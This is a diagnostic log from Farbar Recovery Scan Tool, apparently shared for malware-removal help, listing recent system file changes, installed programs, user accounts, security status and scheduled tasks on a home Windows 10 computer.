2016-12-13 22:58 - 2016-12-09 05:20 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-12-13 22:58 - 2016-12-09 05:20 - 00402272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-12-13 22:58 - 2016-12-09 05:18 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-12-13 22:58 - 2016-12-09 05:15 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-12-13 22:58 - 2016-12-09 04:47 - 22563328 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-12-13 22:58 - 2016-12-09 04:45 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\WordBreakers.dll
2016-12-13 22:58 - 2016-12-09 04:42 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-12-13 22:58 - 2016-12-09 04:37 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-12-13 22:58 - 2016-12-09 04:36 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-12-13 22:58 - 2016-12-09 04:33 - 03777536 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-12-13 22:58 - 2016-12-09 04:30 - 23677952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-12-13 22:58 - 2016-12-09 04:29 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-12-13 22:58 - 2016-12-09 04:27 - 13084160 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-12-13 22:58 - 2016-12-09 04:27 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2016-12-13 22:58 - 2016-12-09 04:26 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-12-13 22:58 - 2016-12-09 04:22 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-12-13 22:58 - 2016-12-09 04:22 - 01490944 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-12-13 22:58 - 2016-12-09 04:21 - 04746752 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-12-13 22:58 - 2016-12-09 04:20 - 00187392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mdmregistration.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-12-13 22:58 - 2016-12-09 04:19 - 00085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditBufferTestHook.dll
2016-12-13 22:57 - 2016-12-09 05:42 - 01637728 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-12-13 22:57 - 2016-12-09 05:42 - 00137568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-12-13 22:57 - 2016-12-09 05:34 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-12-13 22:57 - 2016-12-09 05:34 - 00894096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-12-13 22:57 - 2016-12-09 05:33 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-12-13 22:57 - 2016-12-09 05:33 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-12-13 22:57 - 2016-12-09 05:30 - 00377184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2016-12-13 22:57 - 2016-12-09 05:29 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-12-13 22:57 - 2016-12-09 05:28 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-12-13 22:57 - 2016-12-09 05:20 - 02677544 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2016-12-13 22:57 - 2016-12-09 05:19 - 00168424 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcrypt.dll
2016-12-13 22:57 - 2016-12-09 05:18 - 02913144 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-12-13 22:57 - 2016-12-09 05:18 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-12-13 22:57 - 2016-12-09 05:14 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-12-13 22:57 - 2016-12-09 05:14 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-12-13 22:57 - 2016-12-09 05:10 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-12-13 22:57 - 2016-12-09 05:09 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2016-12-13 22:57 - 2016-12-09 04:41 - 00380928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincorlib.dll
2016-12-13 22:57 - 2016-12-09 04:38 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-12-13 22:57 - 2016-12-09 04:37 - 00411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-12-13 22:57 - 2016-12-09 04:36 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-12-13 22:57 - 2016-12-09 04:33 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-12-13 22:57 - 2016-12-09 04:28 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-12-13 22:57 - 2016-12-09 04:27 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-12-13 22:57 - 2016-12-09 04:26 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-12-13 22:57 - 2016-12-09 04:25 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-12-13 22:57 - 2016-12-09 04:24 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-12-13 22:57 - 2016-12-09 04:21 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-12-13 22:57 - 2016-12-09 04:20 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-12-13 22:57 - 2016-11-02 05:25 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-12-13 22:56 - 2016-12-09 05:18 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2016-12-13 22:56 - 2016-12-09 05:18 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2016-12-13 22:56 - 2016-12-09 05:18 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2016-12-13 22:56 - 2016-12-09 05:18 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-01-11 00:05 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine
2017-01-10 20:33 - 2016-09-26 19:47 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-01-10 07:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-01-10 07:42 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-01-09 21:26 - 2016-06-04 17:02 - 00000887 _____ C:\Users\Dorraine\Desktop\Networdz.lnk
2017-01-08 14:38 - 2015-10-17 21:34 - 00000000 ___RD C:\Users\Dorraine\Dropbox
2017-01-04 23:18 - 2016-10-08 16:10 - 00051354 _____ C:\Users\Dorraine\Documents\Community Chapel Baptist Church Bulletin, Page 1.odt
2017-01-03 12:33 - 2016-11-15 17:55 - 00000000 ____D C:\Users\Dorraine\AppData\LocalLow\Mozilla
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\ProgramData\TEMP
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster
2016-12-31 17:40 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Videos
2016-12-31 17:35 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming
2016-12-31 17:33 - 2016-07-16 01:04 - 00000000 ___RD C:\Program Files (x86)
2016-12-31 16:36 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2016-12-30 22:51 - 2016-09-26 19:51 - 00262144 ____H C:\Users\DefaultAppPool\NTUSER.DAT
2016-12-27 20:21 - 2016-09-26 19:48 - 00067584 ____S C:\WINDOWS\bootstat.dat
2016-12-27 20:19 - 2016-09-27 01:12 - 00007942 _____ C:\WINDOWS\PFRO.log
2016-12-27 20:19 - 2016-09-26 20:07 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-12-27 20:19 - 2016-09-26 19:57 - 3019087872 ___SH C:\hiberfil.sys
2016-12-27 20:19 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\drivers
2016-12-27 20:19 - 2016-06-24 10:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-27 20:19 - 2016-06-03 14:07 - 268435456 ___SH C:\swapfile.sys
2016-12-27 20:18 - 2016-09-26 19:51 - 104857600 ____H C:\Users\Dorraine\NTUSER.DAT
2016-12-27 20:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\catroot2
2016-12-27 20:18 - 2016-07-16 01:04 - 83886080 _____ C:\WINDOWS\system32\config\SOFTWARE
2016-12-27 20:18 - 2016-07-16 01:04 - 13369344 _____ C:\WINDOWS\system32\config\SYSTEM
2016-12-27 20:18 - 2016-07-16 01:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2016-12-27 20:18 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\DEFAULT
2016-12-27 20:18 - 2016-07-16 01:04 - 00028672 _____ C:\WINDOWS\system32\config\SECURITY
2016-12-27 20:17 - 2016-09-27 01:11 - 06291456 ____H C:\Users\Dorraine\AppData\Local\IconCache.db
2016-12-25 06:51 - 2015-09-28 21:08 - 00000000 __SHD C:\System Volume Information
2016-12-24 15:02 - 2016-11-15 14:32 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-22 23:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Drivers\UMDF
2016-12-22 23:43 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\System32
2016-12-21 23:57 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Pictures
2016-12-21 22:22 - 2016-07-16 06:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs
2016-12-21 22:22 - 2015-10-17 20:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-12-16 15:23 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2016-12-15 21:51 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\Microsoft.NET
2016-12-15 21:32 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\assembly
2016-12-15 20:08 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\config
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000002.regtrans-ms
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-15 11:43 - 2016-09-26 19:50 - 00065536 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-15 11:05 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\WinSxS
2016-12-14 19:19 - 2016-09-26 19:46 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00225032 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-14 19:19 - 2016-09-26 19:46 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-14 19:19 - 2015-09-29 08:09 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-12-14 19:18 - 2016-07-16 06:47 - 00000796 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Boot
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppPatch
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\SysWOW64
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-14 06:06 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2016-12-14 06:04 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-12-14 05:57 - 2015-09-28 15:17 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-12-14 05:55 - 2015-09-28 15:17 - 135632432 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-12-13 22:32 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-12-13 22:32 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-12-12 16:11 - 2016-09-26 19:51 - 00524288 ___SH C:\Users\Dorraine\NTUSER.DAT{289dfd7d-8454-11e6-ba0e-82e1840c0602}.TMContainer00000000000000000002.regtrans-ms
2016-12-12 16:11 - 2016-09-26 19:51 - 00065536 ___SH C:\Users\Dorraine\NTUSER.DAT{289dfd7d-8454-11e6-ba0e-82e1840c0602}.TM.blf
==================== Files in the root of some directories =======
2016-05-17 16:14 - 2016-05-26 23:14 - 0000145 _____ () C:\Users\Dorraine\AppData\Roaming\WB.CFG
2015-10-01 15:14 - 2016-10-13 15:10 - 0013271 _____ () C:\ProgramData\hpzinstall.log
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-12-11 20:57
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Dorraine (11-01-2017 01:59:30)
Running from C:\Users\Dorraine\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 01:10:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2694957348-435827945-4273115747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2694957348-435827945-4273115747-503 - Limited - Disabled)
Dorraine (S-1-5-21-2694957348-435827945-4273115747-1000 - Administrator - Enabled) => C:\Users\Dorraine
Guest (S-1-5-21-2694957348-435827945-4273115747-501 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20042 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Any Video Converter 6.0.7 (HKLM-x32\...\Any Video Converter) (Version: 6.0.7 - Anvsoft)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software_Min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
F2200 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Hearts Screen Saver (HKLM-x32\...\Hearts) (Version: - )
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet F2200 All-In-One Driver Software 14.0 Rel. 6 (HKLM\...\{60D6AAC5-FDC1-49BA-867B-3135F4726156}) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NewFreeScreensaver nfsSnowGlobe2 (HKLM-x32\...\Snow Globe 2 New Free Screensaver_is1) (Version: - NewFreeScreensavers.com)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Spotify) (Version: 1.0.28.87.g8f9312a4 - Spotify AB)
SpywareBlaster 5.5 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.5.0 - BrightFort LLC)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1206 - SUPERAntiSpyware.com)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.59518 - TeamViewer)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
Windows Driver Package - Broadcom (k57nd) Net (05/10/2011 14.8.0.5) (HKLM\...\6629B48C523118E251A0FF9A803F20EC1B1A9344) (Version: 05/10/2011 14.8.0.5 - Broadcom)
Windows Driver Package - Broadcom (k57nd60a) Net (08/25/2012 15.4.0.9) (HKLM\...\E6C66B158167F5F97E7C3CC032E8B9CF807548D1) (Version: 08/25/2012 15.4.0.9 - Broadcom)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{087B3AE3-E237-4467-B8DB-5A38AB959AC9}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{3B092F0C-7696-40E3-A80F-68D74DA84210}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{63542C48-9552-494A-84F7-73AA6A7C99C1}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{7BC0E710-5703-45BE-A29D-5D46D8B39262}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\ooofilt_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{AE424E85-F6DF-4910-A6A9-438797986431}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\propertyhdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{C52AF81D-F7A0-4AAB-8E87-F80A60CCD396}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {09186449-4F69-4D44-AE36-EA2DBCFCF7D4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {14EF3ED1-3A48-4E29-8661-AD0039797D76} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {21F8144E-8385-4FB5-8A93-41ECC6D63326} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2FDD2155-71BB-429A-9A8F-78F4A259FDBD} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
Task: {308E7E8B-2216-4C27-BF3C-045EAA465BB3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-10-21] (Adobe Systems Incorporated)
Task: {313857CE-F959-4F91-BC7B-8277A3515412} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3FD521FC-5F16-49A4-8F32-2343C0DCB866} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {46C40E51-DCC9-49CE-898E-170CA5373F61} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {484686E2-A641-42BE-9D60-660116915CFC} - \CCleanerSkipUAC -> No File <==== ATTENTION
Task: {4BBB7A2E-49CB-4BF4-87CA-DEDAF4EC978E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4F03D14B-6E47-455B-83EA-E7A664B87E99} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {59B535FB-DCA8-41C6-9358-EAEAF710653D} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {63AC7C2E-1E01-4A02-84B0-1558549017E4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {67A22A2A-AA15-4F52-AD6A-062D6178B4C1} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {6855ACB5-22ED-49E6-A845-551DD10C9A9E} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6F4ECD31-E3D7-4C10-B895-82E4C27AA3D0} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {7A59BCF6-FDB6-441C-AFCB-A13B00E6D086} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {7B7D2152-A018-4ECC-B82D-CCE1D62522A4} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {7F33D015-0655-46A8-B3DA-839C16E15F22} - System32\Tasks\{EF120DE6-BF35-43A2-B9B0-F60A443C2B68} => pcalua.exe -a "C:\Program Files (x86)\Xilisoft\YouTube Video Converter\Uninstall.exe"
Task: {815BA402-E344-4BD4-AE42-0CF840DD3A79} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {81E5946D-A837-4EA1-B26C-3B4F71FD0B3D} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {8CA4CABA-7807-41BC-AAB6-00049AC72548} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {8EF7886D-4812-492B-BADC-02DBDCEB3F5A} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
